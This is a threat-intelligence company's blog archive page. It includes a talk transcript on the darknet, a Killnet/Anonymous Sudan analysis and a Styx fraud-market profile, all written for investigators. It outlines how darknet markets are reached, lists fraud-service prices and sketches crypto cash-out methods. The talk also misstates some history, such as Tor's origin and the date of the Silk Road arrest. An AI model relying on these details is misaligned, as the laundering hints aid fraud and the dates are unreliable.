Author: DarkOwl Content Team

[Speaking Session Transcription] What is the Darknet and how is it used in Cybercriminal Investigations?

Written by DarkOwl Content Team on . Posted in Blog, Webinars.

July 12, 2023

Or, watch on YouTube

Have you ever heard of The Onion Router (TOR) ? Have you ever ventured onto the dark web, maybe a forum or a marketplace? Or have you heard of Open-Source Intelligence (OSINT)? Or have you ever been curious to learn more about what it is like to work in cybersecurity?

The American University of Cairo welcomed Richard Hancock from DarkOwl, an experienced cybercrime investigator, on the history and evolution of the darknet, how it is typically accessed, and how the darknet can be used in threat intelligence and cybercrime investigations.

NOTE: Some content has been edited for length and clarity.

Dr. Sherif Aly: Gives me a pleasure to introduce Richard Hancock today, who works for DarkOwl. Richard has a quite a bit of extensive experience in digital forensics and mining the dark web, if I can say. And it’s a good opportunity to hand it over to you to better introduce yourself and what you do.

Richard Hancock: Absolutely. Thanks a lot, Sherif. Thanks for having me and appreciate you guys taking time out of your day to listen to me speak about the darknet and all the cool things I see on there. So, I work for a company called DarkOwl. What we do is we have a user interface, a searchable user interface, that we give to clients that want to search on the darknet in a safe way.

Going into a little bit about my background before we go into what the darknet is and how to use it for cybercriminal investigations. So a little bit about my background. I have over 7 years experience as an open source intelligence investigator. I spent 4 years living in Amman, Jordan and Abu Dhabi as well. So some of the topics that I’ve focused on would be Arabic linguistics, counterterrorism darknet intelligence, social engineering, and cybercrime.

One of the things I focus on right now, my current job title is Darknet Intelligence Analyst and Sales Engineering Team Lead. It’s a really long title, but kind of my everyday. What my everyday looks like is, I start out my day getting onto various darknet forums in marketplaces and I direct our collections team to collect from the most high value content – usually digital fraud goods, counterfeit items that are things that would be of interest to our clients. So spending a lot of time in the darknet, and then also getting on calls and speaking to people to try to get them to pay for our platform. And I also wanted to share some of my other hobbies outside of this work because it is pretty serious work; you have to make sure that you have fun outside of work. After I lived in the Middle East for several years I returned back to Colorado, where I went to college, and I’m really big into backcountry skiing as well as DJing underground parties and house music.

What is the Darknet?

The surface net is what you guys would be most most familiar with; this would be any websites that are indexed by search engines like Google, Bing, etc. The deepnet – that’s just a layer further, it’s still the same sites that you’re accessing through those same search engines. However, you need some sort of credentials, username and password to get on to these sites. It could be Netflix. It could be social media. It could also be some criminal hacking forums that are accessible through the surface net.

The part of the Internet that we really focus on is here in the darknet. So in order to get on the darknet, it’s still technically the same Internet. But you need special software in order to access this hidden layer of the Internet, which is used for anonymous communication, selling drugs, or selling counterfeit items. This is the part of the Internet that we really focus on at DarkOwl.

You primarily access the darknet, using all of these software right here. The one that is most popular would be Tor, also known as the onion router. i2p is also popular and same as Zeronet.

The deep net, as I’ve mentioned, is still the same Internet but it’s accessible through search engines like Google and Bing and it can represent social media websites, Netflix, as well as some underground criminal forums that are not darknet specific. That would be like noel.to which is a hacking forum.

However, something that’s really increasing the last several years would be the rise of direct messaging platforms. So criminals are obviously going to be living on the darknet. They’ll be living on the deep web.

But how are they communicating with each other? Are they just using these marketplaces and forums to talk to each other? Not necessarily. An app that we’re seeing is really on the rise right now is Telegram. And that’s primarily because it’s really really easy to use. The cybercriminal ecosystem on Telegram is absolutely massive these days. Whether it’s right wing extremism, Islamic extremism activities, Russia Ukraine and the invasion, misinformation, and people selling Netflix accounts, etc.

History of the Darknet

Let’s talk a little bit about the history of the darknet. When was it created? The Tor browser was created by the Naval Intelligence Unit in the CIA in the United States, back in 2002. It was originally used as a way for agents to communicate with each other in the field, so primarily in places like Iran or Russia. It was just for military intelligence and communication. Since then it has evolved a little bit. It then evolved for agents to use the Tor browser to communicate with their family members, and then the next step was the Tor board of directors allowing public use of the Tor browser for free speech, for activism, for journalism, and then obviously cybercriminal ecosystems quickly grew on here.

So, going into this a little bit further, Bitcoin was created in 2009, and that’s what really facilitated the emergence of the marketplaces and forums, because it allowed people to buy things and make transactions. And in an anonymous way.

The first really big marketplace was the Silk Road. If you guys are familiar with this, you might know the guy, the founder, Ross Ulbricht. There’s a lot of good movies on Netflix, or documentaries that you could probably find on YouTube about this instance. If you’ve not heard of Ross Ulbricht and Silk Road, highly encourage you to check out that story. It’s quite fascinating. He ended up getting arrested by law enforcement in 2016, which marked the shutdown of the Silk Road. And I actually know some of the people who were involved in that investigation, in the arrest of that individual. As the darknet has continued, we’ve seen an increase of law enforcement presence in the rise of something called honeypots. So that’s when Russ Ulbricht, the Silk Road founder was arrested. At that point, that is when we really saw an increasing presence of law enforcement on darknet marketplaces, forums, etc. It really started with a lot of American-centric law enforcement presence but quickly expanded to other countries. And I will tell you from personal experience, one of the most savvy NATO countries in terms of darknet investigations would definitely be the German Government. The German Government is very skilled with darknet cybercrime.

2020 marked the twentieth year that the darknet has been around. The future of the darknet is really going to be interesting, because we will always see things like Tor. People will probably stick around. But as I mentioned, we’re really seeing an increasing use of chat applications which are not part of the darknet. But let’s say you’re a ransomware actor – you’re definitely going to be using Telegram just like you would those forums and marketplaces, or in the [.] onion sites where you start, where you actually are hosting corporate leaks, databases, and things like that.

Content in the Darknet

There’s a lot of different things on the darknet. Some things that are really popular in the media about the darknet would be drugs or assassins for hire, and while those things definitely exist on there, it’s not very actionable, especially for the kind of clients that we help in the kind of investigations that I am doing. The primary content that we’re seeing is hacking related. So whether that’s somebody that’s developed an exploit for a specific tool, somebody’s leaked source code for a particular company, or maybe somebody’s sharing leaked databases that contain usernames and passwords associated with like admin credentials for a company.

You know, there’s a lot of different things you can see on there: counterfeit items, passports, pilot certificates, cryptocurrency, fraud, credit card fraud is super widespread. And then, as well, as you know, drugs, weapons, there is quite a bit of child exploitation, child pornography material on the darknet as well. Unfortunately.

So pointing out some more additional examples and some of the things that we we are able to collect when we’re crawling from the darknet:

So when we’re crawling information from the darknet, we’re not scraping pictures like this [see image above]. We’re just scraping the raw text. In this specific example, we’re seeing somebody who’s hosted this information on a [.] onion site. I’m not sure how serious this threat was, but they were claiming to be targeting Donald Trump and Mike Pence for an assassination, and they actually included a QR code with a Bitcoin wallet address, and we were able to track that wallet. This is the kind of information that investigators use within our platform and our data to pull on strings and investigate individuals further, because if you’re able to identify a Bitcoin wallet with an individual on the darknet you can search upon that Bitcoin wallet and see where else they might be using it, maybe on Telegram, a marketplace or a forum. As I mentioned, there’s a lot of counterfeit documents being sold on the darknet. During Covid we saw a lot of Covid scams, tons of counterfeit, fake covid documents, vaccinations cards, as well as we see passports, drivers licenses, certificates and other things as well.

I did mention that there is extremism presence in the darknet. When ISIS was starting in 2014, they actually did have quite a big presence on an onion site. However, today we’re not seeing a very big presence of Islamic terrorists, Islamic extremist groups on the darknet itself. However, we do see quite a bit on Telegram. So this specific shot is from a group known as Jerusalem Electronic Army, which is loosely affiliated with the some Hamas cybergroups. And this is issuing out a target for a water sanitation facility in Israel. And these kinds of attacks, cyberactors targeting industrial control systems for critical infrastructure, is definitely something that’s on the rise. We’ve seen that in Russia, Ukraine. We’ve seen it within the United States, and I can tell you from a Federal government level within the United States, we’re putting a lot a lot of money and effort into building coalitions between agencies to monitor these types of things. Sometimes here at DarkOwl, we actually get agents who ask us specific questions about threats to critical infrastructure. So it’s something that’s on the minds of a lot of people these days. As I also mentioned, drugs are really big on the darknet, going back all the way to the beginning of the Silk Road. That’s what it was primarily used for. I would say, again, it’s probably not the most popular part of the darknet these days. Like I said, it’s going to be that hacking information – basically selling data on individuals and corporations.

This specific screenshot is showing AlphaBay Market, which is a really popular market that had temporarily gone offline after a law enforcement seizure, and then did come back online in 2021. This is something that we’ve seen quite a bit in the last 2 years. I know recently 2 marketplaces that have been shut down: Genesis as well as Monopoly market.

Something that a lot of people in my industry are very skeptical of is when a marketplace is offline by law enforcement seizure, whether it’s Interpol or the United Nations, Drug Enforcement, or whatever it is, if that marketplace or forum returns, at a certain point we pretty much consider that to be co-opted by law enforcement. So probably the admin of that site has been arrested, and maybe they’re using that admin for their skills and things like that. But they’re continuing the existence of that market or forum for the primary purpose of collecting information on individuals and surveillance.

I also mentioned credit card fraud, which is really widespread on the darknet. There’s just huge databases out there that people can easily pay for, that include, credit card numbers, bin numbers, as well as the personal identity, the PII, associated with the individuals bank account information. So that’s really widespread in the darknet as well as people who are selling methodologies to target specific banks. Maybe it’s check fraud, wire fraud, all different types of fraud. It’s really widespread not just to sell access to somebody’s credit card information, but actually to sell access to information, how to commit fraud against a bank or a credit card company.

Right here is an example of telecommunications fraud.

This specific example looks like spoof calling in India. This is absolutely widespread. Any company that has a large mobile application user base, eo whether that’s Coinbase, Netflix and those kind of companies are going to be targeted for fraud the most on the darknet. It’s actually, it’s pretty funny. And a lot of the investigations that we’re going through, from a government level, people are always asking about sophisticated nation state actors. But I’ll tell you, the people that I interact with the most on the darknet are really eager, like 15 to 17 year olds that are trying to become hackers. And for a long time people weren’t taking these individuals serious because they’re like, how serious can you take a teenager? Well, I can tell you that most of the fraud of those companies I just mentioned, UberEats and Netflix, etc – that type of fraud is usually perpetrated by teenagers, and it’s quite often these days when their parents aren’t home, a 15 year old, hanging out with their buddies Friday night, rather than you know, maybe 10 years ago, trying to take money from their parents purse, they’ll actually try to steal somebody’s Pizza Hut account on Telegram and get free pizza for the night. So kind of funny, the world that we’re living in today.

So different types of cryptocurrency used on the darknet.

If you want to purchase something in the darknet, be it a legal or illegal item, cryptocurrency is how you purchase that item anonymously. These 6 cryptocurrencies that are most used are: Bitcoin, Monero, ethereum, Zcash, Dash, and litecoin. There are others, for sure, and you will actually see on one of the emerging dark parts of the darknet called Loki – they’ve actually created their own cryptocurrency within their network, which is pretty sweet. Cryptocurrency is the primary vehicle for illegal transactions on the darknet, and as I mentioned, monitoring cryptocurrency and wallet address activity is a really good way to monitor cybercriminal activity. And when we’re dealing with law enforcement, this is one of the primary vectors in the primary information that they’re searching within our platform.

How do we get to the Darknet?

I had mentioned Tor, the onion router. This is this the primary way people get to the darknet and as I mentioned, it was created all the way back in 2002 – I’m sure it looked a little bit different. When you do get on the darknet, you can enter addresses above in the search bar, or you can search for DuckGo. But the thing that you guys need to understand about the darknet is this is a community and you can only find information if you become an active member of the community. So what I’m trying to say is, if you want to search in that search bar, show me the top 10 criminal marketplaces – you’re just not going to get anywhere. If you’re a new threat actor, you’ll start on one site and that’s called Dread. Dread is the reddit equivalent of the darknet. It’s a great place for young hackers to start their journey and to find links to different marketplaces and forums and basically to interact with users who might be vendors selling illegal items on those forums.

Dread is kind of the the starting point if you will. But you need to know what the URL is for, that there might be a way you can use some open source, Google dorking technique on Google to find some links for that. But it’s really a need to know. And yeah, as as you find more and more links, you get deeper and deeper into these communities.

There are other ways to get to the darknet. It is really popular, this actually re-surged in popularity, since the Russian invasion of Ukraine. So there’s a huge, heavy Russian language, cyberactor presence on this site. It’s a lot more difficult to set up than Tor. If you want to set up the Tor browser, you really just need to have pretty basic understanding of setting up virtual machines, manually configuring proxies and downloading the Tor browser, and using burner numbers and things like that. But I2P is a bit more technical in terms of setting up the server. And it’s something that I’m actually trying to learn more this year, because it’s a it’s a part of the darknet that’s been growing recently, especially with the Russian cyber threat actor community.

There are other ways to get there. There’s a lot of different ways to access the darknet. The one I primarily use is gonna always be Tor but also ZeroNet and FreeNet. What you need to know is the darknets evolving and changing constantly. I keep mentioning Loki, and that’s because it’s quite interesting, because they have their own cryptocurrency known as on oxen.

How is Darknet Data used in Cyber Investigations?

So darknet intelligence is just a one component of open source intelligence. Open source intelligence – there’s social media intelligence, there’s private intelligence. There’s a lot of different kinds of intelligence data feeds that investigators use to conduct investigations. Darknet data is really useful to add into the full spectrum of sources that you’re using. So you can make informed decisions to strategic decisions, right? So if somebody’s looking at somebody’s username on a clearnet, maybe on a social media website, maybe they’re using a similar username on a darknet forum or some other tools.

If you guys are interested in open source search techniques, Michael Basil’s book right here. This guy is awesome. He is really, really, really, knowledgeable and he’s got the most extensive book for all the different types of open source intelligence, searching techniques. If you guys are interested in this stuff, highly encourage you to check him out.

And here’s a quick example of basically what I was explaining; searching a username on Google and then eventually leading out to darknet forums. So in this specific example, we found somebody had asked us about an individual who goes by the name of Ninja Shopper. So we first search that on Google and find a YouTube page. And then we were able to find actually a Discord server where this individual has a presence as well as another alias. We found this guy and his sunglasses over here, and his long beard – looks like a pretty typical sitting behind the computer threat actor. We were then able to find a Github account, which gave us more information, which eventually led us to this male avatar for unique sunglasses, and then searching for this username, these 3 usernames, I should say we were able to find this individual’s presence on darknet forums like RaidForums. Some personal information was leaked on RaidForums. So this is just showing you that these are the kinds of investigations that we’re doing all day. Some of the other illegal activity you’ll see out there is cyber espionage, threats to public officials, child abusive materials, wildlife trafficking, domestic extremism, drug trafficking, threat against critical infrastructure, credit card fraud, telecommunications fraud, counterfeit documents, malware, and a lot more.

Interested in learning how DarkOwl can help with your darknet investigations? Contact us.

OSINT Combine Renews Partnership with DarkOwl to Give Clients Continued Access to Darknet Data

Written by DarkOwl Content Team on . Posted in Press Releases, Products and Use Cases.

July 10, 2023

OSINT Combine, Australia’s premier OSINT training and software provider, is thrilled to announce a renewed strategic partnership with DarkOwl, a renowned darknet data leader. This collaboration will continue to empower OSINT Combine’s clients with access to DarkOwl’s extensive darknet database, bolstering their open-source intelligence capabilities and enabling them to address complex operational requirements more effectively through training, software solutions, and consulting services.

Chris Poulter, Founder and CEO of OSINT Combine, emphasizes the strategic significance of the partnership, stating: “Renewing our partnership with DarkOwl will allow us to continue to provide our customers with the top darknet data available on the market. Their commitment to supporting time-sensitive activities aligns perfectly with our organization’s mission in offering solutions to combat human trafficking, terrorism, and provide support to law enforcement, corporate entities, and personnel protection domains. We are excited to continue to use DarkOwl’s expertise in the darknet to expand our NexusXplore platform.”

OSINT Combine has a proven track record of developing robust OSINT capabilities within strategic organizations globally, offering advanced training and software solutions to government entities such as national intelligence agencies, tri-service military units, local and federal law enforcement agencies, as well as private sector organizations including Fortune 500 and ASX 200 companies.

Mark Turnage, CEO of DarkOwl, praises OSINT Combine’s outstanding work and is thrilled to be able to continue supporting their remarkable mission, stating: “OSINT Combine has demonstrated exceptional expertise in their field. By leveraging DarkOwl’s vast and continuously growing database of darknet data, they will be able to train their clients on effectively utilizing the darknet, which often holds crucial information for investigations. This demonstrates that they are committed to offering sophisticated solutions to their clients.”

About OSINT Combine
OSINT Combine is committed to the innovation of open source intelligence by providing leading edge technology solutions and unparalleled expertise. Our mission is to develop enduring open source intelligence capability within strategically orientated organizations, and are trusted by federal law enforcement, national security agencies, global banks and Fortune 500 companies worldwide. For more information, visit www.osintcombine.com

About DarkOwl
DarkOwl uses machine learning and human analysts to collect automatically, continuously, and anonymously, index and rank darknet, deep web, and high-risk surface net data that allows for simplicity in searching. DarkOwl is unique not only in the depth and breadth of its darknet data, but also in the relevance and searchability of its data, its investigation tools, and its passionate customer service. DarkOwl data is ethically and safely collected from the darknet, allowing users secure and anonymous access to information and threats relevant to their mission. For more information, visit www.darkowl.com.

[Interactive Timeline] Tor and Beyond: Key Developments in the History of the Darknet

Written by DarkOwl Content Team on . Posted in Blog.

July 06, 2023

While the darknet is comprised of many different hidden networks, the The Onion Router (Tor) is by far the most popular and well recognized. In 2006, when the US Naval Research Laboratories handed over Tor to a group of volunteers at the Tor Project, the network’s purpose was to provide a decentralized, censorship resistant platform for users to communicate and share information.

The Tor platform quickly became a haven for criminal activity, facilitating anonymous communication across underground digital communities and forums, elaborate drug marketplaces, child pornography and human trafficking. Consequently, de-anonymizing onion services hosting criminal content has been a focus of many three-letter acronyms government and law-enforcement agencies around the world. Academic researchers and computer network science experts have received numerous grants and government funding to extensively study de-anonymization attack methodologies and have subsequently published numerous journals on the subject, a number of which are sited here. many journal publications exist.

Over the years, DarkOwl has witnessed successful de-anonymization through various techniques including rendezvous point circuits (a.k.a. the cookie attack), time-correlation attacks, distributed denial of service attacks, which often force a criminal onion service to a LE-controlled guard node, (a.k.a. sniper attack), and circuit fingerprinting attacks.

Editors Note: This timeline is interactive. To navigate, use arrows to move right or left, and pinch to zoom. Click on any event to see more details.

While the Tor platform was built to offer a solution to individuals trying to avoid government surveillance and censorship, Tor has also allowed for dark websites with illegal content to flourish. The availability of private browsing networks such as Tor gave rise to other dark websites, communities, and forums. In recent years, the communities who use these technologies have increasingly overlapped with users of dark web adjacent tools that more closely resemble instant messaging platforms, such as Telegram and Discord. For this reason, DarkOwl does not limit their darknet collections to onion sites, but also aggregates data from other technologies such as ZeroNet, I2P, and transient surface-web paste sites.

To learn more about developments on the darknet, subscribe to your newsletter.

Threat Intelligence RoundUp: June

Written by DarkOwl Content Team on . Posted in Blog.

July 03, 2023

Our analyst team shares a few articles each week in our email newsletter which goes every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Car pentesting growing in importance as autos become more connected – IT Brew

The world is becoming more and more tech-centric, and that includes the automotive industry. This shift in car technology demands that cars become more secure, in the tech and cyber sense. This article highlights the importance of penetration testing (pentesting) for electronic control units (ECUs) to secure them against hackers. Read full article.

2. Swiss government warns of ongoing DDoS attacks, data leak – BleepingComputer

On June 12, the Swiss government announced that one of their IT suppliers had been a victim of a ransomware attack and that their data may have been impacted. They then warned that they are not a target in DDoS attacks. These attacks highlight the complex third-party environments almost all organizations and government entities face. Read more.

3. EncroChat takedown led to 6,500 arrests and $979 million seized – BleepingComputer

Last week, Europol announced that they had arrested over 6,600 people and seized $979 million in illicit funds. This came after that the takedown of the EncroChat encrypted mobile communications platform. Learn more.

4. APT37 hackers deploy new FadeStealer eavesdropping malware  – BleepingComputer

APT37, also known as StarCruft, Reaper, or RedEyes, is a state-sponsored North Korean hacking group who has a history of cyber espionage attacking North Korean defectors, educational institutions and EU-based organized that do not align with the North Korean government interests. They are believed to be using a new “FadeStealer” information-stealing malware which has a “wiretapping” feature. This feature allows them to listen and record from their victim’s microphones. Read full article.

5. New ‘PowerDrop’ PowerShell malware targets U.S. aerospace industry – BleepingComputer

Adlumin discovered a new PowerShell malware script named “PowerDrop.” It was discovered being used in attacks against the U.S. aerospace defense industry, when a sample of the malware was found in a U.S. defense contractor’s network. Read more.

6. Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor – The Hacker News

A Chinese state-sponsored actor, Flea, (also known as APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda) has been targeting foreign affair ministries in the Americas from late 2022 into early 2023. The group is linked to cyberattacks targeting governments, diplomatic missions and embassies since at least 2004. Read full article.

7. SmokeLoader Malware Adopts New Tactics, Raises Serious Security Concerns – The Cyber Express

At the beginning of June, the Computer Emergency Response Team of Ukraine (CERT-UA) uncovered a new cyberattack campaign named UAC-0006 that involved distributing SmokeLoader malware, using compromised email accounts and using multiple delivery methods. This attack is a sign of TTP changes and expansion Read more.

Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Killnet and Anonymous Sudan: Identified Link

Written by DarkOwl Content Team on . Posted in Blog.

June 26, 2023

Using DarkOwl Vision, DarkOwl analysts have been monitoring activity related to the Killnet group and identified threats made in the past week relating to the European financial system. As part of this analysis, DarkOwl analysts have identified a link between Killnet and the group Anonymous Sudan.

The First Telegram Post

A post appeared on Telegram on June 15th from the Russian news site Mash which indicated that the threat actor groups REvil, Killnet and Anonymous Sudan were combining in order to mount an attack against European financial institutions. The Mash article was re-posted on both the Anonymous Sudan Telegram channel and the Killnet channel.

The original posts indicated that attacks against the Europe financial institutions would begin in 48 hours from the news article.

No clear indication has been provided of what the nature of the attacks would be but Killnet has historically been responsible for DDoS attacks (Distributed Denial of Service Attack), in which a malicious attack on a network that is executed by flooding a server with useless network traffic, which exploits the limits of TCP/IP protocols and renders the network inaccessible. Most of the posts that have been made have also been posted on the channels of both Killnet and Anonymous Sudan indicating that there is some collaboration behind the admins of these channels.

A new telegram channel was set up purporting to be from the group REvil. This channel welcomed Killnet and also posted a poll for followers of the channel to vote on which financial system in Europe they would like to be targeted. Other than an image of cryptocurrency nothing else has been posted on this channel to date.

Who is REvil?

REvil is a group that conducted ransomware attacks and was assessed to be based in Russia. The group was successful in targeting a number of corporate organizations including Apple, JBS and Colonial Pipeline. In 2021 the group appeared to be disbanded by joint law enforcement actions and their infrastructure was dismantled. It is unclear if the actors reported to be part of this action were previous members of the REvil group or if they are using their name due to their notoriety.

While there has been some reposting of REvil posts on the Killnet and Anonymous Sudan channels the REvil channel has not reposted anything from the other groups. Furthermore, in later posts by Killnet and Anonymous Sudan REvil is not mentioned which may indicate they are less involved in the activity.

Anonymous Sudan and Killnet Acting Together

On June 16th, both Anonymous Sudan and Killnet posted a message suggesting that there were issues with the IBAN banking system. No reporting was identified that indicated that this was the case. The below screenshot is from DarkOwl Vision.

On June 19th, Anonymous Sudan made a post which was provided in both Arabic and English that indicated an attack was imminent and that the timeframe that was reported was made by the media and that they indicated that their attacks would happen in a timeframe not that the results would be evident.

On June 19th, Killnet claimed that they had attacked the European Investment Bank. They provided a post indicating that the attack against the European banking system had begun and provided a screenshot from Wikipedia providing details of the European Investment bank. The message was signed by both Killnet and Anonymous Sudan.

The channel then provided posts which appeared to show that there was an error on a European Investment Bank page.

They then reposted another article from the Mash Telegram channel which indicated the European Investment bank was being targeted by Russian cyber criminals. This included images from the Telegraph, a UK newspaper, and a tweet by the European Investment Bank indicating that they were a victim of a cyberattack. Open-source reporting indicates that the cyberattack was affecting the availability of some of the bank’s websites.

The attack on the European Investment Bank appears to have only effected their websites and is likely a DDoS attack. This is activity both Killnet and Anonymous Sudan have conducted in the past and it is unclear if they have other capabilities that they will utilize. It is possible that the groups were utilizing the name of REvil to suggest they had further capabilities given the groups previous reputation, but there is no data to support this at this time.

Posted on June 21, Killnet made a claim that the International Finance Corporation (IFC) had been taken down.

[TRANSLATED IMAGE]
Goodbye 🤚
Unfortunately, the IFC is no longer working, we ask all partners and staff of the Bank’s organization to go #uy 🖕
The International Finance Corporation (IFC; English International Finance Corporation, English IFC) is an international financial institution that is part of the World Bank. The headquarters of the organization is located in Washington (USA, 2121 Pennsylvania Ave NW, DC 20433).

No evidence was provided to confirm this attack and no reporting has been identified to indicate that the IFC has been successfully targeted.

Other posts on the Telegram channels are targeting other organizations, reposts from other sources or requests for donations to be made.

Conclusion

While these groups have claimed that they will bring down the European financial system there is little evidence to suggest that they are following through with the threat, furthermore the capabilities that these groups have historically utilized suggest that any attacks which take place are likely to be a DDoS attack. DarkOwl will continue to monitor for any further activity.

Don’t miss an update. Subscribe to our weekly newsletter.

Darknet Marketplace Snapshot Series: Styx Market

Written by DarkOwl Content Team on . Posted in Blog.

June 21, 2023

In DarkOwl’s Darknet Marketplace Snapshot blog series, our researchers provide short-form insight into a variety of darknet marketplaces: looking for trends, exploring new marketplaces, examining admin and vendor activities, and offering a host of insights into this transient and often criminal corner of the internet. This edition features Styx market.

Don’t forget to subscribe to our blog at the bottom of this page to be notified as new blogs are published.

What is Styx Market?

Styx is a darknet marketplace selling illegal techniques for committing fraud, money laundering, and access to stolen data. Chatter on the darknet around Styx market first appeared in 2020 before the marketplace officially opened in mid-January 2023.

Figure 1: Captcha to Styx Market; Source: Styx Market

Styx market offers stolen data as well as a variety of products for conducting illegal cyber activities. Examples include 2FA/SMS bypass, Business Full Info/Tax, Installs for stealer, Anti-detect browsers, laundry services, FB/Google logs, Cashout Banks/VCC, Credit Cards (CC), Crypto-mixer, Stealer services, Look up BG/SSN/DOB, RDP (remote desktop protocol)/ VDS (virtual detected server) /VPS (virtual private server), and many more. Table of definitions can be found at the bottom of this blog, here.

Figure 2: Homepage of Styx Market; Source: Styx Market

Infrastructure of Styx Marketplace

Styx marketplace is divided into five main sections: the main page, trusted sellers, auto ESCROW, news, and a filters section to search for specific products on the left side.  

The main page of the marketplace has posts by users advertising what they sell on the market. The users have usernames that are not assigned and can be personalized. The majority of the site is in English and therefore easy to navigate for English-speakers. However, many listings and names of vendors are in Russian. This includes vendors on the Trusted Sellers page. Vendors on a trusted sellers page have typically been vetted by the administration running the site, and therefore are more “trustworthy”.  

DarkOwl analysts assess many sophisticated darknet actors are Russia-based. Therefore, the fact that some vendors and their listings are Russia-affiliated adds to the legitimacy of the marketplace. There are noticeable spelling errors throughout the site in some of the listings posted by vendors. In some cases, a listing will include both a Russian and English translation. Some of the filters that can be used to search for specific products or goods offer a Russian translation right next to them.  

Many kinds of stolen or leaked data for sale are offered in listings. Listings can be found on the main page, under News, and certain kinds of data can be searched for with the filter bar. Looking at individual listings, the personal data available sold is noticeably mostly from the West. The kinds of data for sale are typically PII (personal identifiable information) and credentials – information that can be used for fraud and scams. For example, a hacked database of U.S. payday loans is available for $90. There are also national Spanish identification cards available. Many foreign governments issue national identification cards to their citizens which are used while voting, traveling, applying for government benefits, and are used by law enforcement for identification purposes. Other personally identifiable information from the EU such as credentials are offered in multiple listings. However, multiple APAC (Asia Pacific) countries and Middle Eastern countries are also present on the site.

For payment, Styx market has its own ESCROW-enabled payment system. According to the terms and conditions of the marketplace’s auto-ESCROW, the maximum amount a transaction can be is $1,000,000 USD. The ESCROW system can also be used by buyers and sellers for dispute resolution. They can invite an Arbitrator by clicking on a support button. The Arbitrator takes 4% of each arbitration, and their decision is final.  

The infrastructure of Styx Market relies heavily on a Telegram component. 

In some cases, the “contact seller” button on the marketplace will lead directly to a Telegram channel. Vendors who rely on Telegram will typically have multiple channels tied to their vendor shop– one for administrative support and another for selling their products.  

Figure 3: Trusted Sellers of Styx Market; Source: Styx Market

Focus on Financial Crime

The majority of services on the marketplace appear to be financial. Customer information for digital banking services such as Chime and PayPal are listed as well as more traditional banks including Capital One Bank, Wells Fargo, Citi Bank, and Old National Bank, among others. Access to cryptocurrency exchanges and Bitcoin platforms are prevalent across the site; sites such as Crypto[.]com, Coinbase, BitRue, Kraken, and others are listed by sellers to offer access to compromised accounts or to facilitate cashing out illicit funds. It’s unclear from research which these accounts are offered for, but historically we have seen them used for both.

Figure 4: Wells Fargo Account; Source: Styx Market
Figure 5: KYC Binance Tutorial; Source: Styx Market

The products and data available on Styx can be used to help a cybercriminal at every stage in the process of financial fraud. This could start with social engineering emails targeting CEOs, using lookup services to find and collect data on targeted individuals as reconnaissance such as a mother‘s maiden name or the name of a family pet and past addresses to help access accounts, and creating accounts to drop and launder money. Lookup services are used by cybercriminals and bad actors for reconnaissance. They use lookup service information to help them pass verification and authenticate their victim’s identity when they are committing fraud.

Figure 6: Telegram Channel for a Lookup Service on Styx Market; Source: Telegram

[TRANSLATED IMAGE]
☀️Search manually: 
DL ($8) 
SSN ($8) 
DOB ($2) 
EIN ($10) 
☀️Search via API: 
DL ($8) 
SSN ($8) 
⚙️Connect to the API and search 24/7 

Styx market also provides cash out and money laundering services. Multiple vendors claim to provide this service, and each has their own requirements. For example, the vendor “Verta” typically charges a 50% commission. They also have requirements for the minimum amount of money needed for a transfer: $15,000 minimum per transfer to a personal account and $75,000 minimum per transfer to a business account. 

Figure 7: Verta Requirements; Source: Telegram

Facilitating financial crime appears to be a major component of the services offered on Styx marketplace. Cash out vendors require significant minimums of money for their services. Cash out services are used to turn illicit Bitcoin into fiat currency. This can be an issue if the service, such as Coinbase, requires users to use their real identity and to prove that the crypto funds are legal —neither of which a darknet actor would do.

Banks are wary of cryptocurrencies’ links to the darknet and will likely be hesitant to cash out large sums of crypto, or will raise a red flag and require additional documentation. Darknet cash out services help darknet actors cash out their illegal cryptocurrency by using their own methods to circumvent the system. Exact methods are hard to come by as vendors don’t publish what they are profiting from. However, one way includes using multiple Bitcoin wallets, running them through personalized mixers, and finding a Bitcoin buyer who gives cash in exchange. Another way is to send Bitcoin to a company that will charge a prepaid debit card.

Cash out services typically have minimums and high commissions, indicating that their customer base are actors with illicit cryptocurrency gains who have enough funds that the cash out will be helpful to them despite the high commission. These signals could indicate that Styx market has been designed and built for users who are already experienced in cybercrime, since they appear to have access to a high amount of illicit funds.

Unique Characteristics of Styx Market

DarkOwl analysts have observed a unique characteristic of Styx market is its interconnectedness with Telegram. For each listing, the user has the option to get in contact with the seller directly to purchase the item. A “Get in Contact” button will either bring the user to a page with a chat box on the marketplace itself, or the user will be taken to a Telegram channel. The Telegram channels are a mix of bots or direct access to the sellers themselves. Some Telegram channels, such as the money laundering service “Verta”, are used by the sellers to make public their terms of service and to publish positive reviews of their services. Positive customer reviews are key to gaining trust in the darknet community.  

Limited descriptions of products are given on the site and users are often re-directed to a specific Telegram channel of that vendor. The Telegram channels are either a channel for direct messages to the seller or are the seller’s support Telegram channel.   

A Telegram channel is used to broadcast information to a wide audience; only admins are able to post and there can be an unlimited number of subscribers. A public group is similar to a channel, but all subscribers can post in the chat. Public channels have a username, and anyone can join. Private channels are only accessible if a user is added by the owner or receives a private link to join. Analysts have observed that it is common for darknet vendors to have multiple Telegram accounts, where each is used for a different purpose. One may be just for support, one could be for posting new products, and yet another might be for direct messages to the admin.

Figure 8: Link to Deviant Shop’s Telegram from Styx Market; Source: Styx Market

In the Telegram channels, descriptions of products and availability are shared. Buyers can also get pictures of the kind of products they are looking to buy as proof.

Figure 9: Deviant Shop Telegram Channel; Source: Telegram

A Look at the Vendors of Styx Market

To understand if a darknet marketplace is sophisticated, it is important to assess the legitimacy and level of sophistication of its vendors. Trustworthy darknet marketplaces are more likely to have vendors with a considerable darknet footprint. More legitimacy is afforded to a vendor if they have been selling for multiple years, across different marketplaces, and have been evaluated to be trustworthy and not a scammer. Using DarkOwl Vision, the darknet, and darknet-adjacent sites DarkOwl analysts looked at vendors from Styx market to review the vendor’s footprints across the darknet. The presence on the darknet of the vendors will likely indicate if vendors on Styx market are sophisticated hackers or skids. 

